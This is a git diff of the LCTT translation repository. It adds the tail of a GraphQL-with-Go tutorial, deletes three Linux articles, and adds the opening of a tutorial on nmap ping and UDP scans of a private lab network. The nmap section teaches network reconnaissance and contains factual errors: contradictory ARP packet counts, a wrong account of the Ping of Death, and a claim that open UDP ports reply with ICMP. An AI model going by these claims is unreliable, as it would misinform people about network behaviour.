user 1 +curl -XPOST http://vm:8080/graphql -d '{user(id:1)}' +# Queries to fetch the followers of user2 and, respectively, user1. +curl -XPOST http://vm:8080/graphql -d '{user(id:2){followers{id, email}}}' +curl -XPOST http://vm:8080/graphql -d '{user(id:1){followers{id, email}}}' +# Query to check if user2 is being followed by user1\. If so retrieve user1's email, otherwise return null. +curl -XPOST http://vm:8080/graphql -d '{user(id:2){follower(id:1){email}}}' +# Query to return ids and emails for all the users being followed by user3. +curl -XPOST http://vm:8080/graphql -d '{user(id:3){followees{id, email}}}' +# Query to retrieve the email of user3 if it is being followed by user1. +curl -XPOST http://vm:8080/graphql -d '{user(id:1){followee(id:3){email}}}' +# Query to fetch user1's post2 and retrieve the title and body. If post2 was not created by user1, null will be returned. +curl -XPOST http://vm:8080/graphql -d '{user(id:1){post(id:2){title,body}}}' +# Query to retrieve all data about all the posts of user1. +curl -XPOST http://vm:8080/graphql -d '{user(id:1){posts{id,title,body}}}' +# Query to retrieve the user who wrote post2, if post2 was written by user1; a contrived example that displays the flexibility of the language. +curl -XPOST http://vm:8080/graphql -d '{user(id:1){post(id:2){user{id,email}}}}' +``` + +_Listing 2_ + +By carefully desiging the mutations and type attributes, powerful and expressive queries are possible. + +### Designing the PostgreSQL database + +The relational database design is, as usual, driven by the need to avoid data duplication. This approach was chosen for two reasons: 1\. to show that there is no need for a specialized database technology or to learn and use new design techniques to accommodate a GraphQL API. 2\. to show that a GraphQL API can still be created on top of existing databases, more specifically databases originally designed to power REST endpoints or even traditional server-side rendered HTML websites. + +See _Appendix 1_ for a discussion on differences between relational and graph databases with respect to building a GraphQL API. _Listing 3_ shows the SQL commands to create the new database. The database schema generally matches the GraphQL schema. The `followers` relation needed to be added to support the `follow/unfollow` mutations. + +``` +CREATE TABLE IF NOT EXISTS users ( + id SERIAL PRIMARY KEY, + email VARCHAR(100) NOT NULL +); +CREATE TABLE IF NOT EXISTS posts ( + id SERIAL PRIMARY KEY, + user_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE, + title VARCHAR(200) NOT NULL, + body TEXT NOT NULL +); +CREATE TABLE IF NOT EXISTS comments ( + id SERIAL PRIMARY KEY, + user_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE, + post_id INTEGER NOT NULL REFERENCES posts(id) ON DELETE CASCADE, + title VARCHAR(200) NOT NULL, + body TEXT NOT NULL +); +CREATE TABLE IF NOT EXISTS followers ( + follower_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE, + followee_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE, + PRIMARY KEY(follower_id, followee_id) +); +``` + +_Listing 3_ + +### Golang API Implementation + +The GraphQL parser implemented in Go and used in this project is `github.com/graphql-go/graphql`. It contains a query parser, but no schema parser. This requires the programmer to build the GraphQL schema in Go using the constructs offered by the library. This is unlike the reference [nodejs implementation][4], which offers a schema parser and exposes hooks for data fetching. As such the schema in `Listing 1` is only useful as a guideline and has to be translated into Golang code. However, this _“limitation”_ offers the opportunity to peer behind the levels of abstraction and see how the schema relates to the graph traversal model for retrieving data. _Listing 4_ shows the implementation of the `Comment` vertex type: + +``` +var CommentType = graphql.NewObject(graphql.ObjectConfig{ + Name: "Comment", + Fields: graphql.Fields{ + "id": &graphql.Field{ + Type: graphql.NewNonNull(graphql.ID), + Resolve: func(p graphql.ResolveParams) (interface{}, error) { + if comment, ok := p.Source.(*Comment); ok == true { + return comment.ID, nil + } + return nil, nil + }, + }, + "title": &graphql.Field{ + Type: graphql.NewNonNull(graphql.String), + Resolve: func(p graphql.ResolveParams) (interface{}, error) { + if comment, ok := p.Source.(*Comment); ok == true { + return comment.Title, nil + } + return nil, nil + }, + }, + "body": &graphql.Field{ + Type: graphql.NewNonNull(graphql.ID), + Resolve: func(p graphql.ResolveParams) (interface{}, error) { + if comment, ok := p.Source.(*Comment); ok == true { + return comment.Body, nil + } + return nil, nil + }, + }, + }, +}) +func init() { + CommentType.AddFieldConfig("user", &graphql.Field{ + Type: UserType, + Resolve: func(p graphql.ResolveParams) (interface{}, error) { + if comment, ok := p.Source.(*Comment); ok == true { + return GetUserByID(comment.UserID) + } + return nil, nil + }, + }) + CommentType.AddFieldConfig("post", &graphql.Field{ + Type: PostType, + Args: graphql.FieldConfigArgument{ + "id": &graphql.ArgumentConfig{ + Description: "Post ID", + Type: graphql.NewNonNull(graphql.ID), + }, + }, + Resolve: func(p graphql.ResolveParams) (interface{}, error) { + i := p.Args["id"].(string) + id, err := strconv.Atoi(i) + if err != nil { + return nil, err + } + return GetPostByID(id) + }, + }) +} +``` + +_Listing 4_ + +Just like in the schema in _Listing 1_, the `Comment` type is a structure with three attributes defined statically; `id`, `title` and `body`. Two other attributes `user` and `post` are defined dynamically to avoid circular dependencies. + +Go does not lend itself well to this kind of dynamic modeling, there is little type-checking support, most of the variables in the code are of type `interface{}` and need to be type asserted before use. `CommentType` itself is a variable of type `graphql.Object` and its attributes are of type `graphql.Field`. So, there’s no direct translation between the GraphQL DSL and the data structures used in Go. + +The `resolve` function for each field exposes the `Source` parameter which is a data type vertex representing the previous node in the traversal. All the attributes of a `Comment` have, as source, the current `CommentType` vertex. Retrieving the `id`, `title` and `body` is a straightforward attribute access, while retrieving the `user` and the `post` requires graph traversals, and thus database queries. The SQL queries are left out of this document because of their simplicity, but they are available in the github repository listed in the _References_ section. + +### Comparison with REST in common scenarios + +In this section we will present a common blog page rendering scenario and compare the REST and the GraphQL implementations. The focus will be on the number of inbound/outbound requests, because these are the biggest contributors to the latency of rendering the page. + +The scenario: render a blog post page. It should contain information about the author (email), about the blog post (title, body), all comments (title, body) and whether the user that made the comment follows the author of the blog post or not. _Figure 1_ and _Figure 2_ show the interaction between the client SPA, the API server and the database, for a REST API and, respectively, for a GraphQL API. + +``` ++------+ +------+ +--------+ +|client| |server| |database| ++--+---+ +--+---+ +----+---+ + | GET /blogs/:id | | +1\. +-------------------------> SELECT * FROM blogs... | + | +---------------------------> + | <---------------------------+ + <-------------------------+ | + | | | + | GET /users/:id | | +2\. +-------------------------> SELECT * FROM users... | + | +---------------------------> + | <---------------------------+ + <-------------------------+ | + | | | + | GET /blogs/:id/comments | | +3\. +-------------------------> SELECT * FROM comments... | + | +---------------------------> + | <---------------------------+ + <-------------------------+ | + | | | + | GET /users/:id/followers| | +4\. +-------------------------> SELECT * FROM followers.. | + | +---------------------------> + | <---------------------------+ + <-------------------------+ | + | | | + + + + +``` + +_Figure 1_ + +``` ++------+ +------+ +--------+ +|client| |server| |database| ++--+---+ +--+---+ +----+---+ + | GET /graphql | | +1\. +-------------------------> SELECT * FROM blogs... | + | +---------------------------> + | <---------------------------+ + | | | + | | | + | | | +2\. | | SELECT * FROM users... | + | +---------------------------> + | <---------------------------+ + | | | + | | | + | | | +3\. | | SELECT * FROM comments... | + | +---------------------------> + | <---------------------------+ + | | | + | | | + | | | +4\. | | SELECT * FROM followers.. | + | +---------------------------> + | <---------------------------+ + <-------------------------+ | + | | | + + + + +``` + +_Figure 2_ + +_Listing 5_ contains the single GraphQL query which will fetch all the data needed to render the blog post. + +``` +{ + user(id: 1) { + email + followers + post(id: 1) { + title + body + comments { + id + title + user { + id + email + } + } + } + } +} +``` + +_Listing 5_ + +The number of queries to the database for this scenario is deliberately identical, but the number of HTTP requests to the API server has been reduced to just one. We argue that the HTTP requests over the Internet are the most costly in this type of application. + +The backend doesn’t have to be designed differently to start reaping the benefits of GraphQL, transitioning from REST to GraphQL can be done incrementally. This allows to measure performance improvements and optimize. From this point, the API developer can start to optimize (potentially merge) SQL queries to improve performance. The opportunity for caching is greatly increased, both on the database and API levels. + +Abstractions on top of SQL (for instance ORM layers) usually have to contend with the `n+1` problem. In step `4.` of the REST example, a client could have had to request the follower status for the author of each comment in separate requests. This is because in REST there is no standard way of expressing relationships between more than two resources, whereas GraphQL was designed to prevent this problem by using nested queries. Here, we cheat by fetching all the followers of the user. We defer to the client the logic of determining the users who commented and also followed the author. + +Another difference is fetching more data than the client needs, in order to not break the REST resource abstractions. This is important for bandwidth consumption and battery life spent parsing and storing unneeded data. + +### Conclusions + +GraphQL is a viable alternative to REST because: + +* while it is more difficult to design the API, the process can be done incrementally. Also for this reason, it’s easy to transition from REST to GraphQL, the two paradigms can coexist without issues. +* it is more efficient in terms of network requests, even with naive implementations like the one in this document. It also offers more opportunities for query optimization and result caching. +* it is more efficient in terms of bandwidth consumption and CPU cycles spent parsing results, because it only returns what is needed to render the page. + +REST remains very useful if: + +* your API is simple, either has a low number of resources or simple relationships between them. +* you already work with REST APIs inside your organization and you have the tooling all set up or your clients expect REST APIs from your organization. +* you have complex ACL policies. In the blog example, a potential feature could allow users fine-grained control over who can see their email, their posts, their comments on a particular post, whom they follow etc. Optimizing data retrieval while checking complex business rules can be more difficult. + +### Appendix 1: Graph Databases And Efficient Data Storage + +While it is intuitive to think about application domain data as a graph, as this document demonstrates, the question of efficient data storage to support such an interface is still open. + +In recent years graph databases have become more popular. Deferring the complexity of resolving the request by translating the GraphQL query into a specific graph database query language seems like a viable solution. + +The problem is that graphs are not an efficient data structure compared to relational databases. A vertex can have links to any other vertex in the graph and access patterns are less predictable and thus offer less opportunity for optimization. + +For instance, the problem of caching, ie. which vertices need to be kept in memory for fast access? Generic caching algorithms may not be very efficient in the context of graph traversal. + +The problem of database sharding: splitting the database into smaller, non-interacting databases, living on separate hardware. In academia, the problem of splitting a graph on the minimal cut is well understood but it is suboptimal and may potentially result in highly unbalanced cuts due to pathological worst-case scenarios. + +With relational databases, data is modeled in records (or rows, or tuples) and columns, tables and database names are simply namespaces. Most databases are row-oriented, which means that each record is a contiguous chunk of memory, all records in a table are neatly packed one after the other on the disk (usually sorted by some key column). This is efficient because it is optimal for the way physical storage works. The most expensive operation for an HDD is to move the read/write head to another sector on the disk, so minimizing these accesses is critical. + +There is also a high probability that, if the application is interested in a particular record, it will need the whole record, not just a single key from it. There is a high probabilty that if the application is interested in a record, it will be interested in its neighbours as well, for instance a table scan. These two observations make relational databases quite efficient. However, for this reason also, the worst use-case scenario for a relational database is random access across all data all the time. This is exactly what graph databases do. + +With the advent of SSD drives which have faster random access, cheap RAM memory which makes caching large portions of a graph database possible, better techniques to optimize graph caching and partitioning, graph databases have become a viable storage solution. And most large companies use it: Facebook has the Social Graph, Google has the Knowledge Graph. + +-------------------------------------------------------------------------------- + +via: http://alexandrutopliceanu.ro/post/graphql-with-go-and-postgresql + +作者:[Alexandru Topliceanu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/topliceanu +[1]:http://graphql.org/learn/ +[2]:https://github.com/topliceanu/graphql-go-example +[3]:https://github.com/topliceanu/graphql-go-example +[4]:https://github.com/graphql/graphql-js diff --git a/sources/tech/20170109 Troubleshooting tips for the 5 most common Linux issues.md b/sources/tech/20170109 Troubleshooting tips for the 5 most common Linux issues.md deleted file mode 100644 index 912b76583e..0000000000 --- a/sources/tech/20170109 Troubleshooting tips for the 5 most common Linux issues.md +++ /dev/null @@ -1,72 +0,0 @@ - Vic020 - -Troubleshooting tips for the 5 most common Linux issues -============================================================ - -### Learn how to tackle the most common challenges Linux desktop users encounter. - - ![Troubleshooting tips for the 5 most common Linux issues](https://opensource.com/sites/default/files/styles/image-full-size/public/images/law/rh_003601_05_mech_osyearbook2016_containers_cc.png?itok=0ZEfXLEE "Troubleshooting tips for the 5 most common Linux issues") -Image by :  - -Opensource.com - -Although Linux installs and operates as expected for most users, inevitably some users will run into problems. For my final article in The Queue column for the year, I thought it would be interesting to summarize the most common technical Linux issues people ran into in 2016\. I posted the question to LinuxQuestions.org and on social media, and I analyzed LQ posting patterns. Here are the results. - -### 1\. Wifi drivers (especially Broadcom chips) - -Generally speaking, wifi drivers—and Broadcom cards in particular—continue to be one of the most problematic technical issues facing Linux. There were hundreds of posts about this topic on LQ alone in 2016, and myriad more elsewhere. Dozens of Broadcom wireless cards are available, and detailed instructions for getting them to work with each distribution is far too involved for a single article, but the basic troubleshooting steps are the same: - -* ascertain exactly which Broadcom card you have by using _lspci_ to find out the PCI ID, -* determine whether the distribution you use supports that card, -* and if it does, identify the proper way to get the card working. - -For example, if you have a 14e4:4315 PCI ID and are using Ubuntu, then you know the BCM4312 card is supported by installing the _firmware-b43-installer_package. The other option you have is to research the wifi card before your purchase to ensure it's fully supported by your distribution of choice out of the box. - -### 2\. Printer drivers (especially Canon and Lexmark) - -Printers also continue to be problematic, with Canon and Lexmark repeatedly cited for being an issue. If you're purchasing a new printer, research compatibility before you buy. But if you are migrating from another operating system, that may not be an option. If you are doing research, the [OpenPrinting][1] database and the official support channel for your distribution are the two best places to start. Note that you should ensure all functionality of a device is fully compatible, especially if it's a multifunction product. One common complaint with Canon printers is that the drivers are often only available on non-English and sometimes obscure sites. - ->If you're purchasing a new printer, research compatibility before you buy. - -### 3\. Video - -Video is a nuanced topic, as simple straightforward video works extremely well out of the box on Linux. Where the issues pop up are video accelerators/​acceleration; the latest video cards and newest technologies, such as NVIDIA Optimus and ATI dynamic GPU switching; installation and stability of proprietary drivers; efficient power management; and reliable suspend and resume. If you're not a gamer, do not need high-end graphics for another reason, and are not on a laptop, then you probably don't have to worry about this. If you're looking for a new laptop, be sure to research compatibility before your purchase. If you're a gamer or need the highest-end graphics, you'll need to know exactly what your requirements are and start your research there. Luckily, the situation here is improving and, Wayland teething issues aside, the situation should be quite a bit better in 2017. - -### 4\. Audio - -Once again, for simple setups, audio has been easy to configure and reliable under Linux for a while. As soon as you get into professional production, echo cancellation, audio routing, unified mixing, and other complex setups, however, it can go south pretty quickly. My suggestion is to use one of the dedicated audio-related distributions if you need high-end real-time audio. - -### 5\. Installation - -With a category this all-encompassing, it's almost guaranteed to be high volume. That said, I don't know that it's fair to say Linux has wide-spread installation issues. The vast majority of installs go as expected. The sheer variety of hardware that Linux supports, and nearly infinite combinations of hardware on which Linux installs are attempted, inevitably lead to edge cases here and there. Keep in mind that end users rarely install other operating systems, such as Mac OS and Windows, as they come pre-installed on new devices. - ->The vast majority of installs go as expected. - -### Future looks bright - -Other issues that were mentioned frequently include Bluetooth, suspend/resume, HiDPI, and touchscreens. You may see a pattern forming here—most of the issues noted in this article focus on desktop use cases. When you think about it, that makes sense. With Linux desktop adoption being relatively low, the result is that less testing and resources go into finding and fixing related issues. As desktop usage increases, you can anticipate these areas improving. - -On that note, I thought it would be nice to end with a mention of one area that used to pop up frequently as a problem area for Linux, and very rarely does these days: fonts. Only a few short years ago, getting high-quality antialiased fonts were the exception. With modern distribution releases, it has become the rule. - -What technical Linux issues did you find most common in 2016? Let me know about them in the comments. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/jeremy-garcia.jpg?itok=kqOMWJIg) - -Jeremy Garcia - Jeremy Garcia is the founder of LinuxQuestions.org and an ardent but realistic open source advocate. Follow Jeremy on Twitter: @linuxquestions - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/yearbook-linux-troubleshooting-tips - -作者:[Jeremy Garcia][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/jeremy-garcia -[1]:http://www.openprinting.org/printers diff --git a/sources/tech/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md b/sources/tech/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md deleted file mode 100644 index b319296627..0000000000 --- a/sources/tech/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md +++ /dev/null @@ -1,33 +0,0 @@ -It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users -============================================================ - - -### The app is now available for Ubuntu Linux and other distros - -In a very brief announcement posted on Twitter earlier today, January 11, 2016, [Discord][1], the company behind the popular, free, and secure all-in-one voice and text chat for gamers, announced the first stable release of their app for Linux platforms. - -Linux was the missing piece for them to achieve full status and offer their services across all major platforms, both on desktop and mobile. Discord is currently available for Android, iOS, Mac, and Windows, but you can also use it directly from the Web, using a compatible web browser. - -The app appears to be a direct competitor to Microsoft's Skype VoIP client, as well as the well-known TeamSpeak voice communication platform. It offers a wide range of features, including IP and DDoS protection, in-game overlay, smart push notifications, individual volume control, support for multiple channels, and a modern text chat. - -Other noteworthy features of Discord include support for codecs, permissions, and custom keyboard shortcuts, a direct messaging system and friends list. It also promises to keep the CPU usage as minimal as possible, offering low latency support for audio and automatic failover functionality. - -### Install Discord on Ubuntu now - -The first stable release of the official Discord app for Linux systems, versioned 0.0.1, is currently [available for download][2] as a binary package for Debian and Ubuntu-based distributions, such as Ubuntu, Debian, Linux Mint, etc. However, to install it, you'll need to have a 64-bit installation. - -There's also a source tarball available for download in case you're not running an operating system based on Debian or Ubuntu, but you'll have to compile it. It appears that Discord 0.0.1 already made its way into the Arch Linux AUR repositories, and it's coming soon to Solus, too. Other distros may add Discord to their repositories in the coming weeks. - --------------------------------------------------------------------------------- - -via: http://news.softpedia.com/news/it-s-time-to-ditch-skype-and-teamspeak-discord-launches-its-app-for-linux-users-511753.shtml - -作者:[ Marius Nestor ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://news.softpedia.com/editors/browse/marius-nestor -[1]:https://discordapp.com/ -[2]:https://discordapp.com/download diff --git a/sources/tech/20170111 Linux command line navigation tips and tricks - part 1.md b/sources/tech/20170111 Linux command line navigation tips and tricks - part 1.md deleted file mode 100644 index 4a49c35c85..0000000000 --- a/sources/tech/20170111 Linux command line navigation tips and tricks - part 1.md +++ /dev/null @@ -1,150 +0,0 @@ -# translating by ruskking -Linux command line navigation tips and tricks - part 1 -============================================================ - -### On this page - -1. [Linux command line tips/tricks][3] - 1. [Easily switch between two directories - the quick tip][1] - 2. [Easily switch between two directories - related details][2] -2. [Conclusion][4] - -If you've just started using the command line in Linux, then it's worth knowing that it is one of the most powerful and useful features of the OS. The learning curve may or may not be steep depending on how deep you want to dive into the topic. However, there are some Linux command line tips/tricks that'll always be helpful regardless of your level of expertise. - -In this article series, we'll be discussing several such tips/tricks, hoping that they'll make your command line experience even more pleasant. - -But before we move ahead, it's worth mentioning that all the instructions as well examples presented in this article have been tested on Ubuntu 14.04LTS. The command line shell we've used is bash (version  4.3.11) - -### Linux command line tips/tricks - -Please note that we've assumed that you know the basics of the command line in Linux, like what is root and home directory, what are environment variables, how to navigate directories, and more. Also, keep in mind that tips/tricks will be accompanied by the how and why of the concept involved (wherever applicable). - -### Easily switch between two directories - the quick tip - -Suppose you are doing some work on the command line that requires you to switch between two directories multiple times. And these two directories are located in completely different branches, say, under /home/ and under /usr/, respectively. What would you do?  - -One, and the most straightforward, option is to switch by typing the complete paths to these directories. While there's no problem with the approach per se, it's very time consuming. Other option could be to open two separate terminals and carry on with your work. But again, neither this approach is convenient, nor it looks elegant. - -You'll be glad to know that there exists an easy solution to this problem. All you have to do is to first switch between the two directories manually (by passing their respective paths to the **cd** command), and then subsequent switches can be accomplished using the **cd -** command. - -For example: - -I am in the following directory: - -``` -$ pwd -/home/himanshu/Downloads -``` - -And then I switched to some other directory in the /usr/ branch: - -``` -cd /usr/lib/ -``` - -Now, I can easily switch back and forth using the following command: - -``` -cd - -``` - -Here's a screenshot showing the **cd -** command in action. - -[ - ![The Linux cd command](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips.png) -][5] - -An important point worth mentioning here is that if you make a switch to a third directory in between all this, then the **cd -** command will work for the new directory and the directory from which the switch was made. - -### Easily switch between two directories - related details - -For the curious bunch, who want to know how the **cd -** command works, here's the explanation: As we all know, the cd command requires a path as its argument. Now, when a hyphen (-) is passed as an argument to the command, it's replaced by the value that OLDPWD environment variable contains at that moment. - -[ - ![The cd command explained](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-oldpwd.png) -][6] - -As it would be clear by now, the OLDPWD environment variable stores the path of previous working directory. This explanation is there is the man page of the cd command, but sadly, it's likely that you'll not find the man page pre-installed on your system (it's not there on Ubuntu at least). - -However, installing it is not a big deal, all you have to do is to run the following command: - -``` -sudo apt-get install manpages-posix -``` - -And then do: - -``` -man cd -``` - -Once the man page opens, you'll see that it clearly says: - -``` -- When a hyphen is used as the operand, this shall be equivalent - to the command: - - cd "$OLDPWD" && pwd -``` - -Needless to say, it's the cd command that sets the OLDPWD variable. So every time you change the directory, the previous working directory gets stored in this variable. This brings us to another important point here: whenever a new shell instance is launched (both manually or through a script), it does not have a 'previous working directory.' - -[ - ![Hyphen and the cd command](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-no-oldpwd.png) -][7] - -That's logical because it's the cd command which sets this variable. So until you run the cd command at-least once, the OLDPWD environment variable will not contain any value. - -Moving on, while it may seem counterintuitive, the **cd -** and **cd $OLDWPD** commands do not produce same results in all situations. Case in point, when a new shell has just been launched. - -[ - ![cd command example](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-oldpwd-home.png) -][8] - -As clear from the screenshot above, while the **cd -** command complained about the OLDPWD variable not being set, the **cd $OLDPWD** command did not produce any error; in fact it changed the present working directory to the user's home directory. - -That's because given that the OLDPWD variable is currently not set, $OLDPWD is nothing but an empty string. So, the **cd $OLDPWD** command is as good as just running **cd**, which - by default - takes you to your home directory. - -Finally, I've also been through situations where-in it's desirable to suppress the output the **cd -** command produces. What I mean is, there can be cases (for example, while writing a shell script), where-in you'll want the **cd -** command to not produce the usual directory path in output. For those situations, you can use the command in the following way: - -``` -cd - &>/dev/null -``` - -The above command will redirect both file descriptor 2 (STDERR) and descriptor 1 (STDOUT) to [/dev/null][9]. This means that any error the command produces will also be suppressed. However, you'll still be able to check the success of failure of the command using the generic [$? technique][10] - the command **echo $?** will produce '1' if there was some error, and '0' otherwise. - -Alternatively, if you're ok with the **cd -** command producing an output in error cases, then you can use the following command instead: - -``` -cd - > /dev/null -``` - -This command will only redirect the file descriptor 1 (STDOUT) to `/dev/null`. - -### Conclusion - -Sadly, we could only cover one command line-related tip here, but the good thing is that we managed to discuss a lot of in-depth stuff about the **cd -**command. You are advised to go through the tutorial thoroughly and test everything  - that we've discussed here -  on your Linux box's command line terminal. Also, do go through the command's man page, and try out all the features documented there. - -In case you face any issue or have some doubt, do share with us in comments below. Meanwhile, wait for the second part, where-in we'll discuss some more useful command line-related tips/tricks in the same manner as has been done here. - --------------------------------------------------------------------------------- - -via: https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/ - -作者:[Ansh][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/ -[1]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#easily-switch-between-two-directories-the-quick-tip -[2]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#easily-switch-between-two-directories-related-details -[3]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#linux-command-line-tipstricks -[4]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#conclusion -[5]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips.png -[6]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-oldpwd.png -[7]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-no-oldpwd.png -[8]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-oldpwd-home.png -[9]:https://en.wikipedia.org/wiki/Null_device -[10]:http://askubuntu.com/questions/29370/how-to-check-if-a-command-succeeded diff --git a/sources/tech/20170111 NMAP Common Scans – Part One.md b/sources/tech/20170111 NMAP Common Scans – Part One.md new file mode 100644 index 0000000000..8cd1341089 --- /dev/null +++ b/sources/tech/20170111 NMAP Common Scans – Part One.md @@ -0,0 +1,94 @@ +NMAP Common Scans – Part One +======================== + +In a previous article, ‘[NMAP Installation][1]’, a listing of ten different ZeNMAP Profiles were listed. Most of the Profiles used various parameters. Most of the parameters represented different scans which can be performed. This article will cover the common four scan types. + +**The Common Four Scan Types** + +The four main scan types which are used most often are the following: + +1. PING Scan (-sP) +2. TCP SYN Scan (-sS) +3. TCP Connect() Scan (-sT) +4. UDP Scan (-sU) + +When using NMAP to perform scans these four scans are the four to keep in mind. The main thing to keep in mind about them is what they do and how they do it. This article covers the PING and UDP scans. The next article will cover the TCP scans. + +**PING Scan (-sP)** + +Some scans can flood the network with packets, but the Ping Scan only puts, at most, two packets on the network. The two packets do not count DNS Lookup or ARP Requests if needed. A minimum of one packet is required per IP Address being scanned. + +A typical PING operation is used to determine if a network host is on-line with the IP Address specified. For example, if I were on the Internet and found that I could not reach a specific Web Server I could PING the Server to determine if it were on-line. The PING would also verify that the route between my system and the Web Server was also functioning. + +**NOTE:** When discussing TCP/IP the information is both useful for the Internet and a Local Area Network (LAN) using TCP/IP. The procedures work for both. The procedures would also work for a Wide Area Network (WAN) just as well. + +If the Domain Name Service (DNS) Server is needed to find the IP Address (if a Domain Name is given) then extra packets are generated. For example, to ‘ping linuxforum.com’ would first require that the IP Address (98.124.199.63) be found for the Domain Name (linuxforum.com). If the command ‘ping 98.124.199.63’ was executed then the DNS Lookup is not needed. If the MAC Address is unknown, then an ARP Request is sent to find the MAC Address of the system with the specified IP Address. + +The PING command sends an Internet Control Message Protocol (ICMP) packet to the given IP Address. The packet is an ICMP Echo Request which needs a response. A response will be sent back if the system is on-line. If a Firewall exists between the two systems a PING can be dropped by the Firewall. Some servers can be configured to ignore PING requests as well to prevent the possibility of a PING of Death. + +**NOTE:** The PING of Death is a malformed PING packet which is sent to a system and causes it to leave a connection open to wait for the rest of the packet. Once a bunch of these are sent to the same system it will refuse any connections since it has all available connection opened. The system is then technically unavailable. + +Once a system receives the ICMP Echo Request it will respond with an ICMP Echo Reply. Once the source system receives the ICMP Echo Reply then it knows the system is on-line. + +Using NMAP you specify a single IP Address or a range of IP Addresses. A PING is then performed on each IP Address when a PING Scan (-sP) is specified. + +In Figure 1 you can see I performed the command ‘nmap -sP 10.0.0.1-10’. The program will try to contact every system with an IP Address of 10.0.0.1 to 10.0.0.10\. An ARP is sent out, three for each IP Address given to the command. In this case thirty requests went out – two for each of the ten IP Addresses. + + ![Figure 01.jpg](https://www.linuxforum.com/attachments/figure-01-jpg.105/) + +**FIGURE 1** + +Figure 2 shows the Wireshark capture from another machine on the network – yes it is a Windows system. Line 1 shows the first request sent out to IP Address 10.0.0.2\. The IP Address 10.0.0.1 was skipped due to it being the local system on which NMAP was being run. Now we can say that there were only 27 ARP Requests since the local one was skipped. Line 2 shows the ARP Response from the system with the IP Address of 10.0.0.2\. Lines 3 through 10 are ARP Requests for the remaining IP Addresses. Line 11 is another response from the system at IP Address 10.0.0.2 since it has not heard back from the requesting system (10.0.0.1). Line 12 is a response from the source system to 10.0.0.2 responding with ‘SYN’ at Sequence 0\. Line 13 and 14 are the system at 10.0.0.2 responding twice with the Restart (RST) and Synchronize (SYN) response to close the two connections it had opened on Lines 2 and 11\. Notice the Sequence ID is ‘1’ - the source Sequence ID + 1\. Lines 15 on are a continuation of the same. + + ![Figure 02.jpg](https://www.linuxforum.com/attachments/figure-02-jpg.106/) + +**FIGURE 2** + +Looking back at Figure 1 we can see that there were two hosts found up and running. Of course the local system was found (10.0.0.1) and one other (10.0.0.2). The whole scan took a total time of 14.40 seconds. + +The PING Scan is a fast scan used to find systems which are up and running. No other information is really found about the network or the systems from the scan. The scan is a good start to see what is available on a network so you can perform more complex scans on the on-line systems only. You may also be able to find systems on the network which should not exist. Rogue systems on a network can be dangerous because they can be gathering internal network and system information easily. + +Once you have a list of on-line systems you can then detect what Ports may be open on each system with a UDP Scan. + +**UDP Scan (-sU)** + +Now that you know what systems are available to scan you can concentrate on these IP Addresses only. It is not a good idea to flood a network with a lot of scan activity. Administrators can have programs monitor network traffic and alert them when large amounts of suspicious activities occur. + +The User Datagram Protocol (UDP) is useful to determine open Ports on an on-line system. Since UDP is a connectionless protocol, a response is not needed. This scan can send a UDP packet to a system with a specified Port number. If the target system does not respond then the Port is either closed or filtered. If the Port is open then a response should be made. In most cases a target system will send an ICMP message back that the Port is unreachable. The ICMP information lets NMAP know that the Port is closed. If a Port is open then the target system should respond with an ICMP message to let NMAP know it is an available Port. + +**NOTE: **Only the top 1,000 most used Ports are scanned. A deeper scan will be covered in later articles. + +In my scan I will only perform the scan on the system with the IP Address 10.0.0.2 since I know it is on-line. The scan sends and receives a total of 3,278 packets. The result of the NMAP command ‘sudo nmap -sU 10.0.0.2’ is shown in Figure 3. + + ![Figure 03.jpg](https://www.linuxforum.com/attachments/figure-03-jpg.107/) + +**FIGURE 3** + +Here you can see that one Port was found open – 137 (netbios-ns). The results from Wireshark are shown in Figure 4\. Not much to see but a bunch of UDP packets. + + ![Figure 4.jpg](https://www.linuxforum.com/attachments/figure-4-jpg.108/) + +**FIGURE 4** + +What would happen if I turned off the Firewall on the target system? My results are quite a bit different. The NMAP command and results are shown in Figure 5. + + ![Figure 